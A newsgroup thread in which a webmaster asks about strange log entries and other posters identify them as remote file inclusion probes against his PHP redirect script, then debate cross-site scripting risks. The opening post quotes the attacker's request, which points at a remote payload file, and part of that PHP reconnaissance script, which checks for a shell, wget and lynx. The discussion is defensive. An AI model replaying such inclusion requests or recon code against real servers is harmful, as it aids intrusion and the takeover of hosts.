strange requests sent to my WWW

Hello,

On my website I have such php script - goto.php (pseudocode):



Generally - it redirects user to the URL provided as "goto" argument.

Now for several weeks I see in my logs that somebody, apparently using Lynx,
requests such URL's:
/goto.php?goto=http://include.intec.edu/breakend_old/abc.txt

where abc.txt is just a source of some php script:
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$infoo = "Link: $HTTP_HOST$REQUEST_URI";
$infoo = "Info: $HTTP_HOST$REQUEST_URI";
if (@file_exists("/bin/sh")) $pro2="/bin/sh Yes"; else $pro2="/bin/sh No";
if (@file_exists("/usr/bin/wget")) $pro3="/usr/bin/wget Yes"; else
$pro3="/usr/bin/wget No";
if (@file_exists("/usr/bin/lynx")) $pro4="/usr/bin/lynx Yes" ; else
$pro4="/usr/bin/lynx No";
(...)

Now I can't guess - why somebody sends such strange requests? Anybody has
some idea?

Thanks in advance!

--
http://www.piotrsobolewski.w.pl/
obfus_01@gazeta.pl obfus_02(at)gazeta.pl obfus_03[at]gazeta.pl

Re: strange requests sent to my WWW

piotr_sobolewski@nospampse-o2.pl writes:

> On my website I have such php script - goto.php (pseudocode):
>
>

[...]

> Now for several weeks I see in my logs that somebody, apparently using Lynx,
> requests such URL's:
> /goto.php?goto=http://include.intec.edu/breakend_old/abc.txt
>
> where abc.txt is just a source of some php script:
> > $HTTP_HOST = getenv("HTTP_HOST");
> $REQUEST_URI = getenv("REQUEST_URI");
> $infoo = "Link: $HTTP_HOST$REQUEST_URI";
> $infoo = "Info: $HTTP_HOST$REQUEST_URI";
> if (@file_exists("/bin/sh")) $pro2="/bin/sh Yes"; else $pro2="/bin/sh No";
> if (@file_exists("/usr/bin/wget")) $pro3="/usr/bin/wget Yes"; else
> $pro3="/usr/bin/wget No";
> if (@file_exists("/usr/bin/lynx")) $pro4="/usr/bin/lynx Yes" ; else
> $pro4="/usr/bin/lynx No";
> (...)
>
> Now I can't guess - why somebody sends such strange requests? Anybody has
> some idea?

If you had been less careful writing your script, and had instead
said:



your script would have downloaded and executed the PHP script in
abc.txt, which from the part shown is gathering information about your
server. If the attack succeeded, it probably would have sent this
information back to the attacker, who could add your server to a list
of "zombie machines" which are willing to execute arbitrary commands.

Fortunately, you were more careful, so the script is just wasting
time. Probably there's another widely-used program called goto.php
that is poorly written, and what you're seeing is an automated script
trying this on thousands of hosts, one of which happens to be yours.

On another note, though your script is safe from that attack, you may
be vulnerable to a less severe cross-site scripting attack, and should
really escape any HTML that happens to be in $goto.

----Scott.

Re: strange requests sent to my WWW

Scott W Gifford wrote:

>> On my website I have such php script - goto.php (pseudocode):
>>
>>
>> (...)
>> Now for several weeks I see in my logs that somebody, apparently using
>> Lynx, requests such URL's:
>> /goto.php?goto=http://include.intec.edu/breakend_old/abc.txt
>
> If you had been less careful writing your script, and had instead
> said:
>
> your script would have downloaded and executed the PHP script in
> abc.txt (...)

Oh, yes, this explains a lot! Thanks for a good idea!

> On another note, though your script is safe from that attack, you may
> be vulnerable to a less severe cross-site scripting attack, and should
> really escape any HTML that happens to be in $goto.

Why? Any HTML code somebody puts in $goto will be interpreted on the local
machine of the guy who sent the request.

--
http://www.piotrsobolewski.w.pl/
obfus_01@gazeta.pl obfus_02(at)gazeta.pl obfus_03[at]gazeta.pl

Re: strange requests sent to my WWW

piotr_sobolewski@nospampse-o2.pl writes:

> Scott W Gifford wrote:

[...]

>> On another note, though your script is safe from that attack, you may
>> be vulnerable to a less severe cross-site scripting attack, and should
>> really escape any HTML that happens to be in $goto.
>
> Why? Any HTML code somebody puts in $goto will be interpreted on the local
> machine of the guy who sent the request.

Right, that's a cross-site scripting attack:

http://www.cgisecurity.com/articles/xss-faq.shtml

Putting clever HTML in there makes it possible to steal from the
client any cookies you've set on your site if they visit a link, trick
somebody who trusts your site into viewing the attacker's page
thinking it's yours, or leverage any special trust somebody has in
your site (for example if a client has allowed it to install code,
show popups, run ActiveX, etc.).

----Scott.

Re: strange requests sent to my WWW

Scott W Gifford wrote:
> piotr_sobolewski@nospampse-o2.pl writes:
>
>> Scott W Gifford wrote:
>
> [...]
>
>>> On another note, though your script is safe from that attack, you may
>>> be vulnerable to a less severe cross-site scripting attack, and should
>>> really escape any HTML that happens to be in $goto.
>> Why? Any HTML code somebody puts in $goto will be interpreted on the local
>> machine of the guy who sent the request.
>
> Right, that's a cross-site scripting attack:
>
> http://www.cgisecurity.com/articles/xss-faq.shtml

Did you miss the HTML Meta Redirect? The attackers code will not show up
in the context of the attacked website.

Re: strange requests sent to my WWW

Sebastian Gottschalk writes:

> Scott W Gifford wrote:
>> piotr_sobolewski@nospampse-o2.pl writes:
>>
>>> Scott W Gifford wrote:
>>
>> [...]
>>
>>>> On another note, though your script is safe from that attack, you may
>>>> be vulnerable to a less severe cross-site scripting attack, and should
>>>> really escape any HTML that happens to be in $goto.
>>> Why? Any HTML code somebody puts in $goto will be interpreted on the local
>>> machine of the guy who sent the request.
>>
>> Right, that's a cross-site scripting attack:
>>
>> http://www.cgisecurity.com/articles/xss-faq.shtml
>
> Did you miss the HTML Meta Redirect? The attackers code will not show up
> in the context of the attacked website.

Hi Sebastian,

Imagine that $goto is set to:

">

The page is then this:

">

My copy of FireFox 1.5 happily executes this JavaScript code. Over
and over again, in fact.

Breaking out of contexts where at first glance it seems safe to put
arbitrary HTML is the essence of any cross-site scripting attack.
It's always safer to escape any user-controlled data before including
it on a Web page, and there's almost never a good reason not to.

In my experience, it's usually faster to just escape the HTML than to
try and convince myself whether or not there's a real possibility of
an attack.

----Scott.

Re: strange requests sent to my WWW

Scott W Gifford wrote:

>> Did you miss the HTML Meta Redirect? The attackers code will not show up
>> in the context of the attacked website.
>
> Hi Sebastian,
>
> Imagine that $goto is set to:
>
> ">
>
> The page is then this:
>
> ">

Now I remember why I wondered? Recent PHP versions support tainting, so
even if the PHP script was used in a legitimate way, it would normally
fail due to the absence of any untainting parser mechanism. Sorry,
missed that.

> Breaking out of contexts where at first glance it seems safe to put
> arbitrary HTML is the essence of any cross-site scripting attack.

Not any, just some. Breaking into contexts or keeping references to a
supposedly discarded context can be fun as well.

> It's always safer to escape any user-controlled data before including
> it on a Web page, and there's almost never a good reason not to.

I would only do so if it's unavoidable wrt the application. Doing a
whitelisting of all allowed values and, if possible, just passing
indexes is much better.